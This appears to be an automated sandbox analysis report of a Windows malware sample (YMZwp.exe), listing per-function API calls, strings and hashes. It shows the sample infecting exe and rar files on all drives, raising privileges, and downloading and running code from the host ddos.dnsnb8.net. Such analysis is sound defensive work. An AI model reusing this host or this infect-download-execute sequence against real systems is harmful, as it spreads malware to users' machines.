                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-3330591207
                                    • Opcode ID: 6ce80fe322d487aa958c71a8b650e433ac76e4e5d5c0bbdfa68d18f4bfc53932
                                    • Instruction ID: e6a1317df6c68e693b56c624e81f7f2988d9a7997afc01c37be1488b2c004f1c
                                    • Opcode Fuzzy Hash: 6ce80fe322d487aa958c71a8b650e433ac76e4e5d5c0bbdfa68d18f4bfc53932
                                    • Instruction Fuzzy Hash: 4C1100B6A00209FBDB209B98CC8AFEF7BFCEB44B54F308555F905B6181D6759E448B60

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 00B32BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00B32BB4
                                    • GetDriveTypeA.KERNEL32(?), ref: 00B32BD3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00B32BEE
                                    • lstrlen.KERNEL32(?), ref: 00B32BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00B32C16
                                    • CreateThread.KERNEL32(00000000,00000000,00B32845,00000000,00000000,00000000), ref: 00B32C3A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: d8bbbbc5e2c9936bdfaf52e09ff77f64a8b40c996eef8c98a3110de622933bb5
                                    • Instruction ID: 97a3bea4f58461def3fd2a30e1e7afbdcaaacd4108266113764b8645bb48e3a4
                                    • Opcode Fuzzy Hash: d8bbbbc5e2c9936bdfaf52e09ff77f64a8b40c996eef8c98a3110de622933bb5
                                    • Instruction Fuzzy Hash: 9D21C0B184015CAFEB249F64AC84EAFBBEDFB04744F340529F94293161EB249E06CB60

                                    Control-flow Graph

                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000080,?,00B332B0,00000164,00B32986,?), ref: 00B31EB9
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00B31ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00B31EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00B31F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00B31F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00B3201E
                                    • memset.MSVCRT ref: 00B320D8
                                    • memset.MSVCRT ref: 00B320EA
                                    • memcpy.MSVCRT ref: 00B3222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B32238
                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B3224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322DD
                                    • WriteFile.KERNEL32(000000FF,00B34008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B3230D
                                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B32322
                                    • UnmapViewOfFile.KERNEL32(?,?,00B332B0,00000164,00B32986,?), ref: 00B32340
                                    • FindCloseChangeNotification.KERNEL32(?,?,00B332B0,00000164,00B32986,?), ref: 00B3234E
                                    • CloseHandle.KERNEL32(000000FF,?,00B332B0,00000164,00B32986,?), ref: 00B32359
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                    • String ID:
                                    • API String ID: 3349749541-0
                                    • Opcode ID: 9e3d1af849176e174319a80ee73f181590e637f2d609dbb6b6ef89cda6b70588
                                    • Instruction ID: fa339ac13fe332e3d57c877404ff6e8120d4be5f26ccbe720437fc49e0eae0ba
                                    • Opcode Fuzzy Hash: 9e3d1af849176e174319a80ee73f181590e637f2d609dbb6b6ef89cda6b70588
                                    • Instruction Fuzzy Hash: DEF18D71900608EFCB24DFA8DC85AADBBF5FF08314F2045AAE519A7661D734AD81CF54

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B31973; nodes are marked Executed or Not Executed]
                                    APIs
                                    • PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                    • CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                    • Sleep.KERNEL32(00000064), ref: 00B319C6
                                    • wsprintfA.USER32 ref: 00B319EC
                                    • CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                    • GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                    • ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00B31A90
                                    • DeleteFileA.KERNEL32(?), ref: 00B31AA7
                                    • VirtualFree.KERNEL32(00B34E60,00000000,00008000), ref: 00B31AC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 2523042076-2537022715
                                    • Opcode ID: 9c7ed20b32b147a439055b2f6015d1716b9d9b28e2c02b8f9408fc2ac34b8769
                                    • Instruction ID: 0cdf42b188e579a6f9c69afd6d4c9e94e0aece10cad71a605f67c4186f94360c
                                    • Opcode Fuzzy Hash: 9c7ed20b32b147a439055b2f6015d1716b9d9b28e2c02b8f9408fc2ac34b8769
                                    • Instruction Fuzzy Hash: 4D515D71901219EFCB149F98CD84AAEBBFDEB04756F2049A9F525E7190D7709E40CB60

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B328B8; nodes are marked Executed or Not Executed]
                                    APIs
                                    • memset.MSVCRT ref: 00B328D3
                                    • wsprintfA.USER32 ref: 00B328F7
                                    • memset.MSVCRT ref: 00B32925
                                    • wsprintfA.USER32 ref: 00B32940
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32A02
                                      • Part of subcall function 00B329E2: wsprintfA.USER32 ref: 00B32A1A
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32A44
                                      • Part of subcall function 00B329E2: lstrlen.KERNEL32(?), ref: 00B32A54
                                      • Part of subcall function 00B329E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00B32A6C
                                      • Part of subcall function 00B329E2: strrchr.MSVCRT ref: 00B32A7C
                                      • Part of subcall function 00B329E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00B32A9F
                                      • Part of subcall function 00B329E2: lstrlen.KERNEL32(Documents and Settings), ref: 00B32AAE
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32AC6
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32ADA
                                      • Part of subcall function 00B329E2: FindFirstFileA.KERNEL32(?,?), ref: 00B32AEF
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32B13
                                    • strrchr.MSVCRT ref: 00B32959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00B32974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-3412794237
                                    • Opcode ID: c01372d398244cc58e85c6bedb0d50f9db43ab732d567452a80a7cc45c061089
                                    • Instruction ID: 82906e4d7725b31fe2d99c7152cd1405959d9d0136348f341d9d67a46e479c80
                                    • Opcode Fuzzy Hash: c01372d398244cc58e85c6bedb0d50f9db43ab732d567452a80a7cc45c061089
                                    • Instruction Fuzzy Hash: 193173769403196BDB209764DC89FDB77ECDB14710F3405E2F945A3191EAB49AC88BA0

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B31099; nodes are marked Executed or Not Executed]
                                    APIs
                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • WinExec.KERNEL32(?,00000005), ref: 00B310F1
                                    • lstrlen.KERNEL32(00B34748), ref: 00B310FA
                                    • wsprintfA.USER32 ref: 00B3112A
                                    • wsprintfA.USER32 ref: 00B31143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00B3115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00B31169
                                    • Sleep.KERNEL32 ref: 00B31179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-2217286572
                                    • Opcode ID: 1f5aec21436480bdd19e2fa7482bdd2e8381054b1bd2bad5c3c0b36634259059
                                    • Instruction ID: 5dae200caffff20eca6c6265a9d31cfcecedf195c30ca92981a269001180458e
                                    • Opcode Fuzzy Hash: 1f5aec21436480bdd19e2fa7482bdd2e8381054b1bd2bad5c3c0b36634259059
                                    • Instruction Fuzzy Hash: 11217A75900208BEDB20DBA4DC89BAFBBFCEB05715F3145E5E500A3150DB74AA848FA0

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00B3164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00B3165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,00000104), ref: 00B3166E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00B316AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00B316BD
                                      • Part of subcall function 00B3139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B313BC
                                      • Part of subcall function 00B3139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B313DA
                                      • Part of subcall function 00B3139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B31448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B316E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-1988126829
                                    • Opcode ID: a988fba597b3f64759153775e0a5d8293a2f8747eeba69bca098004d027c13ed
                                    • Instruction ID: 59b71a0053929407f6a64d4d4d5633e1059e37eab133ec7622e78f0413e15059
                                    • Opcode Fuzzy Hash: a988fba597b3f64759153775e0a5d8293a2f8747eeba69bca098004d027c13ed
                                    • Instruction Fuzzy Hash: 8E11B672541214BBCB246BA8AD4EF9F3EEDEB55761F3404A1F209920B0DB749940C7B1

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B31000; nodes are marked Executed or Not Executed]
                                    APIs
                                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,753C8400,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00B31038
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3104B
                                    • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31075
                                    • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3108B
                                    • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-3273462101
                                    • Opcode ID: 02507e35edb9253946227f2862286f78945caaa4c150a7bee3b3661bc77364a7
                                    • Instruction ID: f761fb8e6d38cb7756c85464fa0f725af8e1632d86f63d5f30eeaa518beb55ab
                                    • Opcode Fuzzy Hash: 02507e35edb9253946227f2862286f78945caaa4c150a7bee3b3661bc77364a7
                                    • Instruction Fuzzy Hash: DE0184B120425CBFE7345F649CC8F2BBBECDB44BA9F204929F245A3090DA705E448B70

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B36076; nodes are marked Executed or Not Executed]
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00B360BE
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00B360DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B36189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B361A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 214a5efbb38501acf98b0ef0f25cf05595c748dbc9a96ad472dd3ce3ac3f35db
                                    • Instruction ID: 012476c4e725977220e1eba57e130646d50e2974401733492c4044f8b3548f54
                                    • Opcode Fuzzy Hash: 214a5efbb38501acf98b0ef0f25cf05595c748dbc9a96ad472dd3ce3ac3f35db
                                    • Instruction Fuzzy Hash: 7D0247B2508785AFDB328F24CC85BEA7BF0EF12310F2985EDD8858B692D774A901C755

                                    Control-flow Graph

                                    [Figure: control-flow graph starting at 00B32C48; nodes are marked Executed or Not Executed]
                                    APIs
                                    • memset.MSVCRT ref: 00B32C57
                                      • Part of subcall function 00B31973: PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                      • Part of subcall function 00B31973: Sleep.KERNEL32(00000064), ref: 00B319C6
                                      • Part of subcall function 00B31973: wsprintfA.USER32 ref: 00B319EC
                                      • Part of subcall function 00B31973: CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                      • Part of subcall function 00B31973: GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                      • Part of subcall function 00B31973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                      • Part of subcall function 00B31973: ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • CreateThread.KERNEL32(00000000,00000000,00B32B8C,00000000,00000000,00000000), ref: 00B32C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,00B316BA,00000001,000000FF,?,00B316BA,00000000), ref: 00B32CAC
                                    • VirtualFree.KERNEL32(00A40000,00000000,00008000,C:\Users\user\AppData\Local\Temp\YMZwp.exe,00B34E5C,00B34E60,?,00B316BA,00000000), ref: 00B32CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B32C69
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 2042498389-3918798735
                                    • Opcode ID: 3ba77cba2b81976d4fbb0fe69993421a2c632763c9cc67781a21d8c6abd46ab7
                                    • Instruction ID: 02f2dc40e84d706c6f5bbf020b75b143cbe504b39361aade8d20bf967a85852f
                                    • Opcode Fuzzy Hash: 3ba77cba2b81976d4fbb0fe69993421a2c632763c9cc67781a21d8c6abd46ab7
                                    • Instruction Fuzzy Hash: 3D018F716412307AD718ABA5EC0AFAF7EECEF01B60F704190B905D61D1EAA0EA44C7F0

                                    Control-flow Graph

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00B31504
                                    • VirtualQuery.KERNEL32(00B314E1,?,0000001C), ref: 00B31525
                                    • ExitProcess.KERNEL32 ref: 00B3157A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: eb0d46976433c0cd2a142af5d98a06062c4be7502d511b0ceeea3e1e1c62fcdc
                                    • Instruction ID: 5707733b8aaca468da8707f3047f1445e20c4e6bdcab45cb65393789ec364ac4
                                    • Opcode Fuzzy Hash: eb0d46976433c0cd2a142af5d98a06062c4be7502d511b0ceeea3e1e1c62fcdc
                                    • Instruction Fuzzy Hash: E2115A75940204EFCB20DFAEA885A7EB7ECEBA4711F31447AF402E3150DB34AD419B50

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: FileTimememset
                                    • String ID:
                                    • API String ID: 176422537-0
                                    • Opcode ID: 3867824248f789159075bd3b8ccadb61a1b8964aef46e8e6c2bb22a5fc24d784
                                    • Instruction ID: 0be931d42a05a80ed8143955aa75e42c99b0c4f5d6f6f0cf9b12e5e9a99551fa
                                    • Opcode Fuzzy Hash: 3867824248f789159075bd3b8ccadb61a1b8964aef46e8e6c2bb22a5fc24d784
                                    • Instruction Fuzzy Hash: E9F06832200209BFD720DE2ADC04BAB77ECEB50761F208A76F516D5050EB30D646CBB0

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00B360DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B36189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B361A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: 1bd291ca92c6046e0e8ac7cafa179e74ac6e6ccb46a0d637f355d21bc548992e
                                    • Instruction ID: cec9562e4a485a25210b97ade792ce90f379ed4bd6ec69418d5d767187cf83d6
                                    • Opcode Fuzzy Hash: 1bd291ca92c6046e0e8ac7cafa179e74ac6e6ccb46a0d637f355d21bc548992e
                                    • Instruction Fuzzy Hash: 99115B31A00649DBCF318E588C857DE37E1EF01300F6A8559DE896F291DA712940CB94
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,?,?,00B313EF), ref: 00B311AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,00B313EF,?,?,?,?,?,?,00B313EF), ref: 00B311BB
                                    • AdjustTokenPrivileges.ADVAPI32(00B313EF,00000000,?,00000010,00000000,00000000), ref: 00B311EB
                                    • CloseHandle.KERNEL32(00B313EF), ref: 00B311FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B313EF), ref: 00B31203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B311A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
